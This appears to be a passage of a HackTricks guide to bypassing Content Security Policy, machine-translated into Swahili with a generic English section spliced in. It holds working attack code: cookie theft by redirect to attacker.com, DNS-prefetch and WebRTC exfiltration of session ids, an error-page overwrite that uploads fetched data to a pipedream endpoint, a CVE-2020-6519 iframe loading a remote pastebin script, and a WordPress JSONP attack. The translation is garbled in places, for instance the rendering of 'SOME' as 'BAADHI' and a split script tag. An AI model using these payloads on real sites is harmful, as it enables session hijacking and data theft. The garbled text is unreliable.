Unaweza kuzuia CSP ya Iframe kwa kutumia sifa ya csp
:
{% code overflow="wrap" %}
<iframe src="https://biohazard-web.2023.ctfcompetition.com/view/[bio_id]" csp="script-src https://biohazard-web.2023.ctfcompetition.com/static/closure-library/ https://biohazard-web.2023.ctfcompetition.com/static/sanitizer.js https://biohazard-web.2023.ctfcompetition.com/static/main.js 'unsafe-inline' 'unsafe-eval'"></iframe>
{% endcode %}
Katika hii CTF writeup, ilikuwa inawezekana kupitia HTML injection kurekebisha zaidi CSP ili script inayozuia CSTI ifungwe na hivyo kuwezesha kutumia udhaifu.
CSP inaweza kuwa ngumu zaidi kutumia HTML meta tags na inline scripts zinaweza kufungwa kwa kuondoa ingizo kuruhusu nonce yao na kuruhusu script maalum ya inline kupitia sha:
<meta http-equiv="Content-Security-Policy" content="script-src 'self'
'unsafe-eval' 'strict-dynamic'
'sha256-whKF34SmFOTPK4jfYDy03Ea8zOwJvqmz%2boz%2bCtD7RE4='
'sha256-Tz/iYFTnNe0de6izIdG%2bo6Xitl18uZfQWapSbxHE6Ic=';">
Uchunguzi wa JS na Kichwa cha Usalama wa Yaliyomo-Uwasilishaji-Ripoti-Pekee
Ikiwa unaweza kufanikiwa kufanya seva itoe kichwa Content-Security-Policy-Report-Only
na thamani inayodhibitiwa na wewe (labda kwa sababu ya CRLF), unaweza kufanya ielekeze seva yako na ikiwa unafunga maudhui ya JS unayotaka kuchukua na <script>
na kwa sababu ni uwezekano mkubwa unsafe-inline
haijiruhusiwi na CSP, hii itasababisha kosa la CSP na sehemu ya skripti (yenye habari nyeti) itatumwa kwa seva kutoka kwa Content-Security-Policy-Report-Only
.
Kwa mfano angalia hii CTF writeup.
CVE-2020-6519
document.querySelector('DIV').innerHTML="<iframe src='javascript:var s = document.createElement(\"script\");s.src = \"https://pastebin.com/raw/dw5cWGK6\";document.body.appendChild(s);'></iframe>";
Kuvuja Taarifa na CSP na Iframe
Iframe
inaundwa inayoelekeza kwa URL (tuiitehttps://example.redirect.com
) ambayo imeruhusiwa na CSP.- Kisha URL hii inaelekeza kwa URL ya siri (k.m.,
https://usersecret.example2.com
) ambayo hairuhusiwi na CSP. - Kwa kusikiliza tukio la
securitypolicyviolation
, mtu anaweza kukamata mali yablockedURI
. Mali hii inafichua kikoa cha URI iliyozuiwa, kuvuja kikoa cha siri ambacho URL ya awali ilielekeza.
Ni muhimu kufahamu kuwa vivinjari kama Chrome na Firefox vina tabia tofauti katika kushughulikia iframes kuhusiana na CSP, ikisababisha kuvuja kwa taarifa nyeti kutokana na tabia isiyojulikana.
Mbinu nyingine inahusisha kutumia CSP yenyewe kudadisi subdomain ya siri. Mbinu hii inategemea algorithm ya utafutaji wa binary na kurekebisha CSP kuingiza vikoa maalum ambavyo vimezuiliwa kwa makusudi. Kwa mfano, ikiwa subdomain ya siri inajumuisha herufi zisizojulikana, unaweza kujaribu subdomains tofauti kwa kubadilisha maelekezo ya CSP kuzuia au kuruhusu subdomains hizi. Hapa kuna sehemu inayoonyesha jinsi CSP inavyoweza kuwekwa ili kurahisisha mbinu hii:
img-src https://chall.secdriven.dev https://doc-1-3213.secdrivencontent.dev https://doc-2-3213.secdrivencontent.dev ... https://doc-17-3213.secdriven.dev
Kwa kufuatilia ni maombi gani yanazuiliwa au kuruhusiwa na CSP, mtu anaweza kupunguza herufi zinazowezekana kwenye subdomain ya siri, hatimaye kufunua URL kamili.
Zote njia zinatumia udhaifu wa utekelezaji wa CSP na tabia katika vivinjari, ikionyesha jinsi sera zenye usalama zinaweza kwa bahati mbaya kufichua taarifa nyeti.
Mbinu kutoka hapa.
Jiunge na HackenProof Discord server ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za makosa!
Machapisho Kuhusu Udukuzi
Shiriki na maudhui yanayochimba kina kuhusu msisimko na changamoto za udukuzi
Taarifa za Udukuzi za Muda Halisi
Kaa sawa na ulimwengu wa udukuzi wenye kasi kupitia taarifa za muda halisi na ufahamu
Matangazo Mapya Zaidi
Baki na taarifa kuhusu tuzo mpya za makosa zinazoanzishwa na sasisho muhimu za jukwaa
Jiunge nasi kwenye Discord na anza kushirikiana na wadukuzi bora leo!
Teknolojia Hatarishi za Kupita Mipangilio ya CSP
Kuzidisha Kibufa cha Majibu ya PHP
PHP inajulikana kwa kuzidisha majibu hadi herufi 4096 kwa chaguo-msingi. Hivyo, ikiwa PHP inaonyesha onyo, kwa kutoa data ya kutosha ndani ya maonyo, majibu yatatumiwa kabla ya kichwa cha CSP, kusababisha kichwa kutozingatiwa.
Kisha, mbinu inategemea kimsingi kujaza kibufa cha majibu na maonyo ili kichwa cha CSP kisitumwe.
Wazo kutoka hapa.
Kubadilisha Ukurasa wa Hitilafu
Kutoka hapa inaonekana ilikuwa inawezekana kupita kinga ya CSP kwa kupakia ukurasa wa hitilafu (labda bila CSP) na kubadilisha maudhui yake.
a = window.open('/' + 'x'.repeat(4100));
setTimeout(function() {
a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0lec.one/upload/ffffffffffffffffffffffffffffffff').then(x=>x.text()).then(x=>fetch('https://enllwt2ugqrt.x.pipedream.net/'+x))">`;
}, 1000);
BAADHI + 'self' + wordpress
BAADHI ni mbinu inayotumia XSS (au XSS iliyopunguzwa sana) katika mwisho wa ukurasa kwa kutumia mwisho mwingine wa asili sawa. Hii hufanywa kwa kupakia mwisho ulio hatarini kutoka kwa ukurasa wa mshambuliaji na kisha kusasisha ukurasa wa mshambuliaji kwa mwisho halisi katika asili ile ile unayotaka kutumia. Kwa njia hii, mwisho ulio hatarini unaweza kutumia kitu cha opener
katika mzigo kufikia DOM ya mwisho halisi unaotumika. Kwa maelezo zaidi angalia:
{% content-ref url="../xss-cross-site-scripting/some-same-origin-method-execution.md" %} some-same-origin-method-execution.md {% endcontent-ref %}
Zaidi ya hayo, wordpress ina mwisho wa JSONP katika /wp-json/wp/v2/users/1?_jsonp=data
ambao utarejea data iliyotumwa kwenye matokeo (ikiwa na kikomo cha herufi, nambari na madokezo).
Mshambuliaji anaweza kutumia mwisho huo kufanya shambulio la BAADHI dhidi ya WordPress na kujumuisha ndani ya <script s
rc=/wp-json/wp/v2/users/1?_jsonp=some_attack></script>
kumbuka kuwa script hii itapakia kwa sababu imeruhusiwa na 'self'. Zaidi ya hayo, na kwa sababu WordPress imefungwa, mshambuliaji anaweza kutumia shambulio la BAADHI kupitia mwisho wa wito ulio hatarini ambao unapita kwa CSP kutoa mamlaka zaidi kwa mtumiaji, kusakinisha programu jalizi mpya...
Kwa maelezo zaidi kuhusu jinsi ya kutekeleza shambulio hili angalia https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/
Kupita Kizuizi cha CSP cha Kufichua
Ikiwa kuna CSP kali ambayo haikuruhusu kuingiliana na seva za nje, kuna mambo kadhaa unaweza kufanya daima kufichua habari.
Mahali
Unaweza tu kusasisha mahali kutuma kwa seva ya mshambuliaji habari ya siri:
var sessionid = document.cookie.split('=')[1]+".";
document.location = "https://attacker.com/?" + sessionid;
Lebo ya Meta
Unaweza kuendeleza kwa kuingiza lebo ya meta (hii ni tu kuelekeza, haitavuja maudhui)
<meta http-equiv="refresh" content="1; http://attacker.com">
DNS Prefetch
Ili kupakia kurasa haraka, vivinjari vitahakikisha kutatua majina ya mwenyeji kuwa anwani za IP na kuzihifadhi kwa matumizi ya baadaye.
Unaweza kuashiria kivinjari kutatua mwenyeji kwa kutumia: <link rel="dns-prefetch" href="kitu.com">
Unaweza kutumia tabia hii kwa kuvuja taarifa nyeti kupitia maombi ya DNS:
var sessionid = document.cookie.split('=')[1]+".";
var body = document.getElementsByTagName('body')[0];
body.innerHTML = body.innerHTML + "<link rel=\"dns-prefetch\" href=\"//" + sessionid + "attacker.ch\">";
Bypassing CSP using Untrusted Directives
Introduction
In some cases, the Content Security Policy (CSP) may include directives that are not properly configured or are too permissive, allowing for potential bypasses. By identifying and exploiting these untrusted directives, an attacker may be able to execute malicious scripts or access unauthorized resources on the target web application.
Steps to Bypass CSP using Untrusted Directives
-
Identify Untrusted Directives: Use tools like Burp Suite or Chrome Developer Tools to analyze the CSP headers and identify any directives that are not properly configured or are too permissive.
-
Exploit Untrusted Directives: Once the untrusted directives are identified, attempt to exploit them by crafting malicious payloads that leverage the misconfigurations to execute arbitrary code or access restricted resources.
-
Test the Bypass: Verify the success of the bypass by sending the crafted payloads and observing the behavior of the web application. If the payloads are executed successfully despite the CSP, the bypass is effective.
Conclusion
Bypassing CSP using untrusted directives can be a powerful technique in scenarios where the policy is not properly configured. By carefully analyzing and exploiting these misconfigurations, an attacker can potentially bypass the security controls implemented by the CSP and carry out malicious activities on the target web application.
const linkEl = document.createElement('link');
linkEl.rel = 'prefetch';
linkEl.href = urlWithYourPreciousData;
document.head.appendChild(linkEl);
Ili kuepuka hili kutokea, server inaweza kutuma HTTP header:
X-DNS-Prefetch-Control: off
{% hint style="info" %} Inavyoonekana, mbinu hii haifanyi kazi kwenye vivinjari visivyo na kichwa (bots) {% endhint %}
WebRTC
Kwenye kurasa kadhaa unaweza kusoma kwamba WebRTC haitathmini sera ya connect-src
ya CSP.
Kwa kweli unaweza kuvuja taarifa kwa kutumia ombi la DNS. Angalia msimbo huu:
(async()=>{p=new RTCPeerConnection({iceServers:[{urls: "stun:LEAK.dnsbin"}]});p.createDataChannel('');p.setLocalDescription(await p.createOffer())})()
Njia nyingine:
var pc = new RTCPeerConnection({
"iceServers":[
{"urls":[
"turn:74.125.140.127:19305?transport=udp"
],"username":"_all_your_data_belongs_to_us",
"credential":"."
}]
});
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
Kuangalia Sera za CSP Mkondoni
Kiotomatiki Kuunda CSP
https://csper.io/docs/generating-content-security-policy
Marejeo
- https://hackdefense.com/publications/csp-the-how-and-why-of-a-content-security-policy/
- https://lcamtuf.coredump.cx/postxss/
- https://bhavesh-thakur.medium.com/content-security-policy-csp-bypass-techniques-e3fa475bfe5d
- https://0xn3va.gitbook.io/cheat-sheets/web-application/content-security-policy#allowed-data-scheme
- https://www.youtube.com/watch?v=MCyPuOWs3dg
- https://aszx87410.github.io/beyond-xss/en/ch2/csp-bypass/
- https://lab.wallarm.com/how-to-trick-csp-in-letting-you-run-whatever-you-want-73cb5ff428aa/
Jiunge na HackenProof Discord server ili kuwasiliana na wadukuzi wenye uzoefu na wawindaji wa tuzo za mdudu!
Machapisho ya Udukuzi
Shiriki na maudhui yanayochimba kina cha udukuzi na changamoto zake
Taarifa za Udukuzi za Wakati Halisi
Kaa up-to-date na ulimwengu wa udukuzi wenye kasi kupitia habari za wakati halisi na ufahamu
Matangazo ya Karibuni
Baki mwelekezi na tuzo mpya za mdudu zinazoanzishwa na sasisho muhimu za jukwaa
Jiunge nasi kwenye Discord na anza kushirikiana na wadukuzi bora leo!
Jifunze udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA USAJILI!
- Pata bidhaa rasmi za PEASS & HackTricks
- Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au fuata sisi kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud github repos.